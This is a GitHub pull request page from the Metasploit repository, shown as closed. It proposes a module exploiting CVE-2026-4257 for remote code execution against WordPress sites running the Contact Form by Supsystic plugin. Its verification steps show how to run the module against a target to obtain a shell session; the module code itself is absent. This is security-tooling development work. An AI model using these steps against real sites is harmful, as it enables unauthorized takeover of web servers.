Skip to content

Contact Form by Supsystic Wordpress Plugin exploit CVE-2026-4257#21258

Closed
bootstrapbool wants to merge 3 commits intorapid7:masterfrom
bootstrapbool:supsystic_contact_form_cve_2026_4257
Closed

Contact Form by Supsystic Wordpress Plugin exploit CVE-2026-4257#21258
bootstrapbool wants to merge 3 commits intorapid7:masterfrom
bootstrapbool:supsystic_contact_form_cve_2026_4257

Conversation

@bootstrapbool
Copy link
Copy Markdown
Contributor

This change adds a module to exploit CVE-2026-4257 resulting in remote code execution on Wordpress sites with the Contact Form by Supsystic plugin.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/wp_plugin_supsystic_contact_form_rce
  • set RHOSTS <target>
  • set TARGETURI <uri to page with contact form> (e.g., /wordpress/index.php/sample-page/)
  • set LHOST <your_ip>
  • exploit
  • On success a shell session will be started
  • If no FIELD argument is provided, one is automatically detected and used

*pcap sent to msfdev@metasploit.com

@bootstrapbool bootstrapbool deleted the supsystic_contact_form_cve_2026_4257 branch April 9, 2026 20:30
@github-project-automation github-project-automation bot moved this from Todo to Done in Metasploit Kanban Apr 9, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Projects

Status: Done

Development

Successfully merging this pull request may close these issues.

3 participants